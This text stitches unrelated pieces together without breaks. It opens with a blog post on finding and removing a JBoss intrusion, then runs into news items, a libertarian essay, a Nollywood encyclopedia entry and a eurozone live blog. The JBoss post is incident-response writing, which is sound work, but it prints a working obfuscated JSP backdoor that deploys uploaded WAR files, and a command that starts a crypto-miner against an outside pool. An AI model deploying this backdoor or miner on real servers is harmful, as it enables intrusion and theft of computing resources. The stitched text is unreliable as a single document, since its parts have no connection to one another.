Find out how they installed a web shell
I started by searching how someone installed a web shell in my Jboss instance. With a bit of googling I found the following resources (the “pwn.jsp” filename was a really big help there)
Which in turn led me to find an existing vulnerability regarding JBoss's HTTP Invoker was probably used, that basically means an attacker could trigger a remote code execution. Not nice!
With additional search I found an exploit ready to be used. A PHP script that downloads a .war application which contains the web shell and uses the known vulnerability in the HTTP invoker to deploy the .war.
But wait a minute, where was that logrotate process that was consuming my CPU (cleverly named so that I wouldn't notice)? If there's a process then there's an executable somewhere. I found it right inside my /JBOSS_HOME/bin folder along with a file named jboss4.txt (also named so that I wouldn't found him suspicious) whose content was
print “Executed”;
system(“nohup ./logrotate -o stratum+tcp://bat.minersbest.com:10470 -u apapun.seattle -p x –threads=4 &> logrotate.log”);
Now, the issue is… was there something else that could have been changed so that even if I restarted JBoss it would allow the attacker to execute the same attack again? Hunt time!
Indeed I found that in /JBOSS_HOME/server/INSTANCE/server/deploy/management was a little folder called “lMvcdFxMFrvdib.war” (I kid you not) and inside the folder a file named “ZqxQljMExRpriU.jsp” (again I kid you not).. the content of the JSP was
<%@page import=”java.io.*,
java.util.*,
sun.misc.BASE64Decoder”
%>
<%
String PJdpj = “”;
String pIGx = “”;
String RSVw = System.getProperty(“jboss.server.home.dir”);
if (request.getParameter(“pUBYyDsT”) != null){
try {
PJdpj = request.getParameter(“pUBYyDsT”);
pIGx = request.getParameter(“oAEICWIo”);
byte[] rFPE = new BASE64Decoder().decodeBuffer(PJdpj);
String MfNJU = RSVw + “/deploy/” + pIGx + “.war”;
FileOutputStream twkH = new FileOutputStream(MfNJU);
twkH.write(rFPE);
twkH.close();
}
catch(Exception e) {}
}
else {
try{
String VBpM = request.getParameter(“oAEICWIo”);
String dhkDS = RSVw + “/deploy/” + VBpM + “.war”;
new File(dhkDS).delete();
}
catch(Exception e) {}
}
Although the variable names are obfuscated you can tell that it receives some content encoded as Base64 and then writes that content to a .war file inside JBoss's deployment directory. Clever trick… if I was to remove the attacker's original war (the one with pwn.jsp) and restart Jboss, this .war file would also be deployed and provide a clear path of attack again!
Securing JBoss
So I had to secure the HTTP Invoker and that was the problem. I had the HTTPInvoker and WebConsole deployed and accessible to anyone (big, big mistake), since I don't need them, I simply removed them, simple enough. Next, to delete the files!
Eliminate the threat
I had to delete the files in JBOSS_HOME/bin which where used to create shell and mine the bitcoins, I had to delete the pwn.jsp that was installed in my JBoss instance and had to delete the war with the crazy name to stop an attacker from deploying another war without my knowledge.
Conclusion
The conclusion is that you can never be to careful with security. Anyone from around the world can try to frak you and you must be very careful. I overlooked the deployment of the web console and HTTP Invoker and I paid for that. Things could have been worse If the attacker found a way to upgrade the privileges of the user running jboss (it's a sudoer, but the password is really hard) he could have done a lot more damage. I hope I've removed the threat but I can't be 100% sure, so I'll have to keep monitoring, but I've learned my lesson.
I found a detailed guide explaining the exploit and how it works, in case you want additional information.
Happy coding and be safe!
Additional resources
Image copyright Twitter Image caption The US magazine promoted its March-April edition on Twitter
Playboy magazine has announced it is bringing back nudity, reversing a decision made last year.
The move was announced by Playboy's new chief creative officer Cooper Hefner, who said the decision to remove nudity entirely "was a mistake".
"Today we're taking our identity back and reclaiming who we are," he tweeted.
The US magazine also promoted its March-April edition with a picture of its playmate of the month with the hashtag #NakedIsNormal.
Some social media users welcomed the U-turn, describing it as a "good call", while others said the decision was taken "because the magazines weren't selling too well. Too bad free porn is still easy to access".
On Monday, Mr Hefner wrote: "I'll be the first to admit that the way in which the magazine portrayed nudity was dated.
"Nudity was never the problem because nudity isn't a problem," added the 25-year-old son of Playboy founder Hugh Hefner.
Playboy: Were no nudes good news?
Image copyright AP Image caption Playboy was founded by Hugh Hefner in 1953
Samir Husni, a journalism professor at the University of Mississippi, said Playboy's ban on nudity had probably alienated more readers than it attracted.
"Playboy and the idea of non-nudity is sort of an oxymoron," he told the Associated Press.
The magazine still had to find a way to appeal to a younger audience in a digital age where nudity has become commonplace, Mr Husni added.
In next month's issue, the magazine will also revive some of its old franchises, including The Playboy Philosophy and Party Jokes.
It also features an essay by actress Scarlett Byrne about the Free the Nipple campaign - a movement that started in the US to change laws around breastfeeding in public and female toplessness.
Byrne writes "about the importance of owning female sexuality and the double standards that still exist between women and men", the magazine says.
However, Playboy will drop the subtitle Entertainment for Men from its covers.
"Playboy will always be a lifestyle brand focused on men's interests, but as gender roles continue to evolve in society, so will we," Mr Hefner said.
Playboy, which was founded in 1953, stopped printing nude photos in March 2016.
Its US owners said at the time that the internet had made nudity outdated, and pornographic magazines were no longer so commercially viable.
Playboy's circulation has dropped from its peak 5.6 million in the 1970s to below 700,000 last year.
However, the magazine's logo showing a rabbit head wearing a bow tie is one of the most recognisable in the world.
The company makes most of its money from licensing it around the world to sell products including toiletries, drinks and jewellery.
SEATTLE — This summer, after spending a little too much time in communion with his Xbox, my 8-year-old son told me he'd like to be a professional video game player when he grows up. My 12-year-old daughter watches YouTube videos of people who record themselves playing video games, devouring them one after another like a box of chocolates.
So in August, when the opportunity arose, I did something that may earn me the title of Best Dad Ever or World's Worst Parent, depending on whether you've reached puberty.
I took my kids to video game little league.
If you haven't noticed, video games are now sports (“e-sports” is the favored term). No, they're not sports in the cardiovascular, tendon-tearing sense. Still, competitive game-playing requires dedication, cheetah-like reflexes, teamwork, tactical smarts and phenomenal concentration.
Elite e-sport stars make millions of dollars a year at tournaments and are watched by tens of thousands in the stands (and millions more online). In early August at KeyArena in Seattle, five young men who call themselves Evil Geniuses defeated a Chinese team on the multiplayer battle game Dota 2 and won $6.6 million.
An unlikely building is switching to solar powered energy.
The Kentucky Coal Mining Museum in Benham is owned by Southeast Kentucky Community and Technical College. Communications Director Brandon Robinson told WYMT, they're hoping to save money by the switch.
"We believe that this project will help save at least eight to ten thousand dollars, off the energy costs on this building alone, so it's a very worthy effort and it's going to save the college money in the long run," said Robinson.
The work began Tuesday to power the energy, not by coal, but by the sun.
"It is a little ironic," said Robinson, "But you know, coal and solar and all the different energy sources work hand-in-hand. And, of course, coal is still king around here."
Robinson said the project was funded through an outside foundation. It cost thousands of dollars, but Tre Sexton, the owner of the company installing the panels, believes the result will pay for itself.
"I think everybody knows when we're talking about attractions like this - these high-volume, low-traffic municipal attractions - something has got to give, to keep their expenses down," said Sexton.
Sexton said, an average house could be run by 20 panels. That would cost somewhere in between $17,000 and $20,000, but would pay off within five to seven years.
The college has faced budget cuts
, but Robinson said the money saved will go right back to the college.
"Of course, in the current economic times we're in, any way to save money is always appreciated and helpful - especially when that's money putting back toward teaching our students," said Robinson.
City officials also told WYMT, the Benham School House Inn is looking into the project.
December 8, 2010 – 11:51 pm by John
In any discussion of libertarian anarchism or even basic free-market economics with someone who is not very libertarian, a libertarian is likely to encounter a response to the effect of, "Well, I see your point about individual freedom and government power, but I believe that everything should have its limits and extremism of any kind is harmful, etc." That sounds reasonable, though not very inspired or principled, and it indicates that at least your interlocutor is approaching the discussion with a respectful attitude. However reasonable it sounds on the surface, an examination of what non-libertarians must do to prevent individual liberty from "running rampant" reveals how truly offensive and disrespectful their policies are and, in the process, how a moral system based on the essential principles of self-ownership and non-aggression is the only type of just or fair system.
The above objection to a Stateless libertarian society implies that society as a whole should use means it considers reasonable to enforce rules and restrictions it considers reasonable on each individual member of the society. Note that libertarian philosophies posit exactly the same thing, to a certain extent: our freedom of association, with which we can shun or ostracize unacceptable members of a group, and our economic freedom, with which we can contribute to the profit and loss of individuals and businesses, would result in a population tending to create for itself the world that it wants, with individual regions or groups deviating from the norm in whatever ways are practical and desirable. However, the crucial difference is in the granting of a monopoly on violence to a privileged group: the State. Because the State, by definition, is not subject to the same set of rules that everyone else in society must abide by, it exists outside of society, enforcing rules on society as it sees fit. And because the State, by definition, enjoys a legal monopoly on the initiation of force, it cannot be expected to be constrained by the society it rules over. The extent to which and the ways in which the State is influenced by its subjects are only according to the desires of the majority and other large, politically organized, powerful lobbies, and not according to the desires of individuals or minority groups outside of those politically influential blocs. In contrast to a free society in which everyone would be free to march to his own drummer, weak/minority groups become marginalized and constrained by powerful/larger lobbies in a Statist society. Even the majority of voters in a given region at a given time often don't get what they want (e.g., Obama's foreign-policy and civil-liberties record). Anthony de Jasay's masterpiece The State is purported to contain the best exposition of this power struggle.
Importantly, a government at any level of geographic jurisdiction (local, state, national, etc.) must enact and enforce laws that are one-size-fits-all, and as most people in Western society have seen from the crony-corporatism and the bailouts of the last few years, most exceptions to the universal laws are made in favor of the (large) companies that help out the politicians the most. Very few people anywhere approve of this, but obviously our only recourse, voting, does no good or else it would be outlawed. As Étienne de La Boétie would remind us, a state continues to exist in the form in which it exists because society at large generally approves of it, but the most important unit of any group, the individual, is persecuted and disenfranchised by the Statist system to the extent that he wants to live his life in peaceful abstinence from the State apparatus and in peaceful disregard of its restraints.
Therefore, however close a state comes to enforcing the mores or demands of the entire populace (in effect, the majority), the libertarian is repulsed by it because no one is permitted the freedom to peacefully abstain from any demand made by that state.
What are some of those demands, made by the State (the majority) on individual subjects, for the purpose of serving the greater good? Paying taxes of all kinds to fund government agencies of all kinds; helping out the less fortunate and otherwise indigent; bailing out business that are "too big to fail"; educating children only in ways that are approved of by local, state, and national school boards; paying for every child's schooling to promote an educated citizenry; being conscripted into jury service to protect your fellow citizens from unfair prosecution; abstaining from ingesting substances that the State declares taboo and harmful to society; using only State-approved notes as currency; paying for the military's defense of the citizens and their land; possibly being conscripted into the military; protecting the environment and natural resources; paying for other people's medical care; protecting the intellectual property of innovators so as to promote more innovation; not harming others in their person or property; and not peacefully (or otherwise) seceding from the State's geographic jurisdiction over all legal affairs.
As good and noble as many of those causes are, there is no cause so noble as to justify violating anyone's rights in order to accomplish it. The rights of the one outweigh the needs of the many, and anything else, for that matter. If that is not true, who are you to say which rights of mine shall be ignored and which I shall have the privilege of maintaining? Why must libertarians always defend our person and property against you and not the other way around? Why am I not permitted to demand that you pay for my food, housing, health care, or bank bailout, that you operate your business according to the (lack of) regulations that I want, and that you be subject to the court system that I desire? Because the State says so? The majority voted on it? There's a social contract? No. That is not acceptable or defensible under any system of logic or morality. Might do not make right, the majority should not rule, and there is no such thing as a social contract.
It is a general truism that ends that are achieved by means of violating anyone's individual liberty cannot result in a net good. And it is a socio-psychological certainty that the type of people who desire the power to manage the affairs of others will violate individual rights in proportion to the greatness they aspire to. I do not support the means that the State uses to accomplish any ends, irrespective of the desirability of the ends themselves, and therefore I do not want to be a party to any of its activities. I am under no moral obligation to obey any of its demands or respect any of its methods, goals, or agents; I only do so out of concern for my own safety and well-being and because I think we can all accomplish more outside of prison than inside of it.
No person, or group of people, or society, or government has the right to demand anything of me other than that I not demand anything of them. No one has the right to demand that I pay anyone anything that I have not previously, willingly, implicitly or explicitly agreed to pay in return for a specific good or service. No one has the right to tell me how to educate my children, run my business, use my land, or redistribute "intellectual property", as long as those actions don't affect anyone else's equal liberty to do the same. No one has the right to tell me what can and can't be used as currency, what I can and can't ingest, or what actions I can partake in with other consenting adults. No one has the right to conscript me into jury duty or military service any more than they have the right to force me into slave labor. The only right we have is for nobody to violate our person, liberty, or property—in other words, to remain in equal moral standing with every other human, such that no one is in a position of power to commit any involuntary action upon another person. From this moral egalitarianism are derived our rights to be free of aggression, fraud, and breach of contract.
These rights are not subject to any terms whatsoever—no modification, no specification, no exception, no infringement, no abrogation, no higher considerations, and certainly not a vote. They are absolute and infinite. I do not demand anything of anyone else, and no one may demand anything of me without my permission and a prior agreement of some kind. Why not? Because I say so. Why don't I have any moral obligation to pay taxes, serve in the military, serve on a jury, ingest only authorized substances, donate money to a certain cause or group, or obey any of the other myriad restrictions the State places on my person, property, and liberty? Because I don't want to. They are my body, property, liberty, and rights to manage as I please, within the identical boundaries that simultaneously constrain and protect every other human being; what other reason could I need for claiming my rights?; who are you to say which of my rights is to be violated and to what extent?; who are you to say that what you want for me supersedes what I want for myself?
No one is fit to govern me but myself. What I freely do with my body and property is not subject to debate or vote. What you want for society is irrelevant, and how you want me to behave is irrelevant. The only reasons the mob's vote has any bearing on our practical world are that the State has the guns and the mob currently chooses not to start with first principles and examine what is right before deciding what is desirable. But it won't be so forever. Because might do not make right, and the majority should not rule. The majority should not rule any more than one person should. The entirety of the human race save one is no more justified in violating the rights of the one than the one would be in oppressing all of humanity.
When Statists say they agree with our assertion of individual rights to some extent, or that this or that limitation should be imposed by the State, or that not even individual liberty should be absolute, what they are really saying is that they have the right to use the violent, deadly police power of the State to restrict what we do with our minds, bodies, and property, and that not only do we not have a reciprocal right to treat them the same way, we don't even have the right to make those decisions for our own minds, bodies, and property. It is simply incoherent to assert such dominion over the liberty, property, and even the body of another. The falseness and invalidity of such a claim is self-evident. This is as certain as Descartes' Cogito ergo sum. Our right to completely control our own bodies is virtually axiomatic (though extensive proofs exist), and all other rights against encroachment follow from it. No claim to a higher good has any bearing on them, and no moral system denying these absolute truths can ever be fair or just.
Posted in Philosophy, Property rights
Making American Great Again? Trump Wins In A Landslinde...With Bobbleheads ST. PAUL, MN August 26, 2016
With precincts reporting from the North, South, Mid-Atlantic, and Midwest, it appears Donald Trump is the clear-cut favorite to win the November election. More scientific than the Rasmussen Poll, more accurate than the Economist/YouGov poll and more respected than the Quinnipiac Poll, the Goldklang Group Bobblection, which began with the 2004 battle between George W. Bush and John Kerry, captures the true pulse of the nation through unique polling: bobbleheads.
As fans entered the gates of the three Goldklang Group teams: St. Paul (MN) Saints, Charleston (SC) RiverDogs and Hudson Valley (NY) Renegades they were asked to choose between a Hillary Clinton bobblehead or a Donald Trump bobblehead, which would count as their “vote.” In all three ballparks Trump was the overwhelming winner.
On August 23 the RiverDogs and Renegades set the tone with Trump taking 62% and 65% of the votes, respectively. In Charleston fans were given a third “party” choice, as 1% entered to win a trip out of the country with one “lucky” winner receiving a one way trip to Canada. While the race was a little closer in St. Paul, Trump was still the decisive winner on August 25 receiving 55% of the votes. While most of the national polls show Clinton with a lead, the Bobblection bump could be enough to carry Trump to a HUUUGE victory in November.
When asked about his level of confidence that Bobbleection 2016 would follow in the footsteps of previous Group-wide accuracy in predicting the nation's next commander-in-chief, Group president Jeff Goldklang responded, “Our fans have spoken. There are clearly two options with no choice, and they believe Trump will prevail in this historic race to the bottom of America's political party system.”
Originally started in 2004 by the Goldklang Group, the one of a kind Bobblection was an accurate predictor of two incredibly close Presidential Races. Back in 2004, the promotion gained national recognition as George W. Bush took four of seven states to win the first ever Bobblection, with CNN broadcasting results live from the swing state of Florida at Hammond Stadium, home of the Ft. Myers Miracle. The network missed the closest race, which took place at Midway Stadium where John Kerry edged George Bush by just 17 bobbleheads. Three months before the actual election and with exit polls showing the race too close to call, the Goldklang Bobblection got it right.
The trend continued in 2008 with a clean sweep by Barack Obama over John McCain. Though there were some close races in New York and Brockton (MA), the soon-to-be president-elect was the most popular candidate by a wide margin in ballparks from South Carolina to South Dakota and especially here in St. Paul, winning by the second largest margin at Midway Stadium.
In 2012, the vote of the baseball population differed from that of the American people. Deciding between the Republican nominee Mitt Romney and incumbent President Barack Obama, fans of 10 different teams voted for the former Massachusetts governor to be the next occupant of the Oval Office. While some teams like the Hickory Crawdad's (NC) gave Romney an overwhelming nod (he won by 14 percentage points), swing states like Florida illustrated how close the election would be, with Obama narrowly winning the vote of the Fort Myers faithful by 0.4 percent.
The Bobblection has become so popular other teams from around the country are taking part this season. In Lincoln, NE the Saltdogs fans spoke to the tune of 66% of the vote for Trump and 35% for Clinton on August 23. The Miracle continued the trend on August 25 when Trump took 60%, with Clinton grabbing 29% and a third option, local DJ's Stan and Haney, getting 11% of the votes. Mahoning Valley (OH) Scrappers go to the polls on August 27 with the Lakewood (NJ) BlueClaws and Hickory (NC) Crawdads rounding it out on September 1 and 2, respectively.
Each team received 500 of each candidate, with the exception of St. Paul who had 750 Clinton and Trump bobbleheads, and the first candidate to have all their bobbleheads selected was declared the winner.
GOLDKLANG GROUP
The Goldklang Group is a sports entertainment consulting and management firm. The Group provides operational consulting and management services in all areas relating to sports franchise, event, and venue acquisition, promotion and operation. The Group owns three teams: St. Paul Saints, Single-A Charleston RiverDogs (New York Yankees) and Low-A Hudson Valley Renegades (Tampa Rays).
White trash, trailer trash, rednecks, hillbillies, squatters, crackers, goobers, bubbas — all the names for these people are insulting. Their avatars in the culture, from Honey Boo-Boo to Bob and Mayella Ewell in "To Kill a Mockingbird," are the opposite of inspiring.
But between the Donald Trump presidential campaign and two well-regarded books just published, poor and working-class white Americans are getting a rare moment of positive focus.
The two books, Nancy Isenberg's scholarly "White Trash: The 400-year Untold History of Class in America" and J.D. Vance's affecting memoir "Hillbilly Elegy," give context to a conversation that Trump blew open.
"Trump opened a door that needed opening before," says Susan Campbell, a writer who was born and raised in the Missouri Ozarks and still goes back from time to time. "Now it's a political force."
Some scholars approach the culture by geography of origin — mostly Scots-Irish — while others stick to economics. The "swamp Yankees" of the rural Northeast, they argue, have many traits in common with their Southern cousins. So do white European ethnics like the Irish of South Boston or the New Jersey culture that produced Bruce Springsteen. (It's no coincidence that the Boss's father had the quintessential lower-class-white job, prison guard.)
From Scotland to the South
But it's the Scots-Irish who come in for the most scrutiny. Michael Lind, an Austin-born, Washington, D.C.-based author who has written often about class divides in America, traces the Scots-Irish travails to the importation of Calvinist Scots to Catholic Northern Ireland by English landlords. These Scots-Irish (really a collection of various Calvinists) migrated to North America, often unwillingly, especially to what would become the Southern colonies, beginning in the 17th century.
"The Quakers, the Yankees, they saw them as uncouth and violent," Lind says. "They all hated the Scots-Irish."
The immigrants, trash in the New World as they were in the Old, were relegated to the dangerous frontier where they squatted on land taken from the Indians. As the frontier moved west, into what would be Kentucky and Tennessee, so did the Scots-Irish, pushed off the newly gentrified land.
In 1828, they saw one of their own elected president, Andrew Jackson.
People like Abraham Lincoln's father moved to Indiana.
Some, such as Sam Houston and Davy Crockett, made their way to Texas.
Eventually, some who stayed behind distilled moonshine during Prohibition (and in so doing gave rise to NASCAR).
Some left the hills to work in the auto industry — for many, a ticket to the middle class.
The factory jobs are gone, but Campbell remembers hearing about when a good manufacturing job was the ideal and the way out of poverty. "You could get a bass boat and you could go to church," she says.
In the '70s and '80s, blue Michigan license plates left the Rust Belt and streamed into Houston, adding to the so-called "hillbilly diaspora."
But some stayed poor. When Lind was growing up on the northwest side of Austin, the poor whites were called "cedar-choppers" for their habit of cutting down trees and selling the wood by the roadside. "They ended up in the hills that nobody wanted, in absolute, desperate poverty," Lind says.
In the culture, such folks come in for either scorn or laughs.
Kill 'Mockingbird'
Both Lind and University of Texas professor John Hartigan Jr. have nothing kind to say about the classic "To Kill a Mockingbird."
"It perpetuates the myth of white trash," says Hartigan, who wrote "Odd Tribes: Toward a Cultural Analysis of White People." In the novel and movie, the well-to-do white people, the Finches, are good and the poor, morally corrupt Ewells are bad. The book sneers at them.
"It's the Southern white elite scapegoat," Lind says. (And don't get these folks started on "Deliverance.")
That the white trash are simultaneously treated almost as badly as black people and still seen as the source of racial prejudice is just one of the paradoxes fueling white-trash hatred. "It's very vivid and powerful," Hartigan says.
Until the '60s, Lind says, it was OK to laugh at two stereotypes: "Amos and Andy" and "Li'l Abner."
In 2016, it's still OK to laugh at the redneck.
Some writers have tried to avoid the stereotypes. Hartigan especially likes Dorothy Allison's novel "Bastard Out of Carolina" and Pete Daniel's non-fiction "Breaking the Land."
The hillbilly culture holds tight to a sense of perpetual bad luck. "In my hometown, there was a saying: The rest of us got hind tit," says Campbell, who wrote a memoir, "Dating Jesus," and whose most recent book is "Tempest-Tossed: The Spirit of Isabella Beecher Hooker."
But for her, and many others, education was a way up and out. "You leave the environment, and then you marry somebody not like you," she says.
Campbell still goes back home to recharge sometimes. It's part of her. "It's where I come from and how I still identify."
Bookmark Gray Matters. The Quakers, the Yankees, they see it as uncouth and violent.
This article is about the colloquial term for Nigerian cinema. For further information on the Nigerian film industry, see Cinema of Nigeria . For the Nollywood television channel in the UK, see Nollywood Movies
Nollywood is a sobriquet that originally referred to the Nigerian film industry.[1] The origin of the term dates back to early 2000s, traced to an article in The New York Times.[2][3] Due to the history of evolving meanings and contexts, there is no clear or agreed-upon definition for the term, and it has been subjected to several controversies.
Etymology [ edit ]
The origin of the term "Nollywood" remains unclear; Jonathan Haynes traced the earliest usage of the word to a 2002 article by Matt Steinglass in the New York Times, where it was used to describe Nigerian cinema.[2][3] Charles Igwe noted that Norimitsu Onishi also used the name in a September 2002 article he wrote for the New York Times.[4][5] The term continues to be used in the media to refer to the Nigerian film industry, with its definition later assumed to be a portmanteau of the words "Nigeria" and "Hollywood", the American major film hub.[6][7][8][9]
Definition of which films are considered Nollywood has always been a subject of debate. Alex Eyengho defined Nollywood as "the totality of activities taking place in the Nigerian film industry, be it in English, Yoruba, Hausa, Igbo, Itsekiri, Edo, Efik, Ijaw, Urhobo or any other of the over 300 Nigerian languages". He further stated that "the historical trajectory of Nollywood started since the pre and post independent Nigeria, with the theatrical (stage) and cinematic (celluloid) efforts of the likes of Chief Hubert Ogunde, Chief Amata, Baba Sala, Ade Love, Eddie Ugboma and a few others".[7]
Over the years the term Nollywood has also been used to refer to other affiliate film industries, such as the Ghanaian English-language cinema, whose films are usually co-produced with Nigeria and/or distributed by Nigerian companies. The term has also been used for Nigerian/African diaspora films considered to be affiliated with Nigeria or made specifically to capture the Nigerian audience.[2][3] There is no clear definition on how "Nigerian" a film has to be in order to be referred to as Nollywood.
Some stakeholders have constantly expressed their disagreement over the term; giving reasons such as the fact that term was coined by a foreigner, as such another form of Imperialism. It has also been argued that the term is an imitation of what was already in existence (Hollywood and Bollywood) rather than an identity in itself, that is original and uniquely African.[8]
Nigerian cinema [ edit ]
Film-making in Nigeria is divided largely along regional, and marginally ethnic and religious lines. Thus, there are distinct film industries – each seeking to portray the concern of the particular section and ethnicity it represents. However, there is the English-language film industry which is a melting pot for filmmaking and filmmakers from most of the regional industries.[citation needed]
The Yoruba-language cinema is a sub-industry of Nollywood, with most of its practitioners in the Western region of Nigeria. The Yoruba-language cinema began as actors of various Yoruba traveling theatre groups began to take their works beyond the stage to delve into movie production using the Celluloid format, as far back as the mid-1960s. These practitioners are considered in some quarters to be the first true Nigerian filmmakers.[10] Movies like Kongi's Harvest (1971), Bull Frog in The Sun (1974), Bisi, Daughter of The River (1977), Jaiyesimi (1980), and Cry Freedom (1981) fall into this era of a blossoming Yoruba movie industry. Practitioners like Ola Balogun, Duro Ladipo and Adeyemi Afolayan (Ade Love) played a significant role when they came out with "Ajani Ogun" in 1976. This film was one of the few huge successes that helped put the Yoruba-language cinema on the map, and it was followed by other productions by Hubert Ogunde and others.[10] One of the first blockbusters from Nigeria, came from the Yoruba language industry; a notable example is Mosebolatan (1985) by Moses Olaiya which grossed ₦107,000 (approx. 2015 ₦44.2 million) in five days of its release.[11]
The Hausa-language cinema, also known informally as Kannywood, is also a sub-industry of Nollywood, mainly based in Kano. The cinema, which is the largest in Northern Nigeria, slowly evolved from the productions of RTV Kaduna and Radio Kaduna in the 1960s. Veterans like Dalhatu Bawa and Kasimu Yero pioneered drama productions that became popular with the Northern audience. The 1990s saw a dramatic change in the Northern Nigerian cinema, eager to attract more Hausa audience who find Bollywood movies more attractive, Kannywood; a cinematic synthesis of Indian and Hausa culture evolved and became extremely popular. Turmin Danya ("The Draw"), 1990, is usually cited as the first commercially successful Kannywood film. It was quickly followed by others like Gimbiya Fatima and Kiyarda Da Ni.[12] Sunusi Shehu of Tauraruwa Magazine created the term "Kannywood" in 1999 and it soon became the popular reference term for the industry. By 2012, over 2000 film companies were registered with the Kano State Filmmakers Association.[13]
Ghanaian English-language cinema [ edit ]
Over the years the term Nollywood has also been used to refer to other affiliate film industries, such as the Ghanaian English-language cinema. Around the year 2006 through 2007, Nigerian filmmaker Frank Rajah Arase signed a contract with a Ghanaian production company, Venus Films, which involved helping to introduce Ghanaian actors into mainstream Nollywood. This collaboration eventually led to extreme popularity of certain Ghanaian actors, such as Van Vicker, Jackie Appiah, Majid Michel, Yvonne Nelson, John Dumelo, Nadia Buari and Yvonne Okoro, arguably as much as their Nigerian counterparts. Furthermore, over the years, due to the high cost of film production in Nigeria, Nigerian filmmakers have been forced to make films outside Lagos in order to cut costs, mirroring the exodus of filmmaking in Hollywood from Los Angeles to cities like Toronto and Albuquerque, a phenomenon known as runaway production. Several other producers, as a result, started shooting in cities like Accra, Ghana, channeling the savings into investing in better equipment, many of them trying to get their films onto the big screen.[14] This development has created a sort of merger between the Nigerian and Ghanaian film industry, and most English language films from Ghana also started answering the tag "Nollywood". This is due to the increased amount of co-productions these films get, and the ease with which they secure distribution deals with Nigerian film production houses. This is also mainly because most non-West Africans cannot differentiate between these movies and Nigerian movies, since it became a norm for major films from Nigeria to star actors from both Nigeria and Ghana.[15]
Nollywood USA [ edit ]
Nollywood USA is a broad term, that is used to refer to Nigerian films made in the diaspora. Although they are popularly called Nollywood USA, these movies can be shot in any non-African country. These films are typically made by Nigerian filmmakers living in the diaspora and they are typically made for the Nigerian audience.[16][17] Like the "Nollywood" term, the definition of "Nollywood USA" is vague.
Nollywood USA movies typically tell Nigerian stories, and they usually star established Nollywood actors, alongside upcoming Nigerian/African actors living in the diaspora.[18][19] The movies usually have their premieres in Nigeria and they also sometimes secure national theatrical release like the regular Nollywood movies.[citation needed]
Nollywood at 20 controversy [ edit ]
In 2012, it was announced that Nollywood would be celebrating its 20-year anniversary. This year marked the 20th year after the release of direct-to-video movie Living in Bondage (1992), which arguably marked the boom in the video film era. The anniversary was eventually celebrated in June 2013.[9][20][21]
The event was later revealed to be a decision of a segment of the industry and not a unanimously agreed event; the event was organized by Association of Movie Producers (AMP), an association consisting of producers of video films.[9][20][21] Since announcement of the "Nollywood @ 20" event in 2012 till its celebration in 2013, the event had sparked controversies from many stakeholders; most of whom believed the industry was much older than 20 years. Since Nollywood has been a term for the entire Nigerian film industry, it was argued that Living in Bondage cannot be used to celebrate the Nigerian film industry, stating that the film wasn't, in fact, the first Nigerian video film, neither was it the first "successful" video film,[22] much less the first Nigerian film.[23]
This controversial celebration also gave rise to reports that another segment of the industry, the "Association of Nigeria Theatre Arts Practitioners (ANTP)" are planning to rename the industry into another term which would encompass the entire history of Nigerian film industry, since the term Nollywood has allegedly become ethnically dichotomized.[21][24] While it was argued by supporters of the event that it was the "Nollywood brand" that was being celebrated and not the industry, counter-arguments were made that the term "Nollywood" came into existence only in the 2000s, so explanations were needed on how the "Nollywood Brand" could be extended to the year 1992 which isn't specifically significant in any way, and why not just to the very first Nigerian film that was made.[25][26]
Alex Eyengho had noted in a 2012 article that the term "Nollywood" was absent during the formative years of both the video film era and the Golden Age.[7] Seun Apara, in his article on 360Nobs.com stated: "It's either the promoters of the event didn't do their research well or intentionally do not want to reckon with history".[9] Adegboyega Oyeniya comments: "I don't know what they are talking about by celebrating 'Nollywood @ 20'; are they celebrating Ramsey Tokunbo Nouah or Genevieve Nnaji? Probably, they are celebrating fortune. These people should stop deceiving Nigerians".[27] Some media outlets also reported that the event was a result of greed and selfish interests, as the organizers visited political figures to solicit funds in the name of the Industry, but allegedly shared the funds raised amongst themselves.[9] Another issue raised to fault the event is that the real "achievers" in Nollywood were not honoured, but rather the practitioners at almost the same level with the organizers of the supposed flawed event were honoured.[23]
Several filmmakers and stakeholders expressed their displeasure with the supposed false celebration; Kunle Afolayan commented: "The whole idea of Nollywood at 20 does not make sense to me because the Nollywood that I know is more than 20 years. I remember my father shot a film about 37 years ago and I also grew up in the industry. As far as am concerned, it's absolute crap".[9] In another interview, he stated: "If Nollywood is the name that people decide to call the movie industry in Nigeria, then I am part of it. If Nollywood is what they say is 20 years, then I am not part of that Nollywood because I have been doing film business for more than 30 years now".[28] Jide Kosoko also commented: "The Nigerian movie industry as far as I'm concerned is not 20 years. If we all truly belong to the same industry, then the industry I belong to is not 20 years. There is a need to tell the world the sincere story of our industry and don't rubbish the pioneers. As far as I am concerned, what they are celebrating is Living in Bondage and not Nollywood".[9] Tunde Kelani stated: "how will Nollywood be celebrating 20 years and I am over 40 years in the industry?".[27]
President of Actors Guild of Nigeria at the time, Ibinabo Fiberesima, admitted that Nollywood is more than 20, but gave what was considered an unconvincing statement on the reason behind the event, stating: "It's about celebrating our own even though Nollywood is more than 20 years. It's been long that people have been celebrating us but right now, we are celebrating ourselves and giving lots back to the society. It's a good step we have taken especially now that the qualities of our movies have improved".[9]
See also [ edit ]
8.36am BST
Former Italian prime minister professor Giuliano Amato, who could be chosen as its new PM today. Photograph: Laura Lezza/Getty Images
Good morning, and welcome to our rolling coverage of the eurozone financial crisis, and other key events in the world economy.
The political deadlock that has gripped Italy and alarmed Europe for two months could finally be broken today when the country's next prime minister is chosen.
Giorgio Napolitano, freshly re-elected as president, has vowed to announce today a PM to lead a new coalition government and try to guide Italy out of recession and away from the heat of the debt crisis.
Italy's centre-left Democratic Party (PD) and the centre-right People of Freedom (PDL) both pledged to support a new coalition government at talks yesterday.
Silvio Bersusconi (who must have enjoyed watching the implosion at PD) played the senior statesman last night, telling reporters that:
Given the crisis the country finds itself in, the country needs a strong, a durable government that can make important decisions.
So, who might get the responsibility? One front-runner is Giuliano Amato, who has already had two stints as Italy's prime minister -- in 1992-1993, and from 2000-2001. But PD's deputy leader, Enrico Letta, is another option.
Alberto Nardelli (@AlbertoNardelli) Repubblica says @enricoletta will be PM, others papers say Amato. Best wait for Napolitano's decision. Not long to wait now. #Italy
There has also been talk that the charismatic mayor of Florence, Matteo Renzi, could be chosen. This seems implausable -- Renzi himself described the idea as amazing and highly unlikely.
Renzi still looks like a future Italian prime minister, though, even if not today...
Also coming up today.... the monthly German Ifo Index will show whether business confidence rose or fell this month. That could indicate whether the German economy is being dragged into recession by the eurozone crisis.
And the row over whether Europe should change the pace of its austerity programme should be relaxed will probably rage on....
I'll be tracking all the developments through the day.
Solterra President Gerry Nichele (centre) with VP Mike Bosa (right)
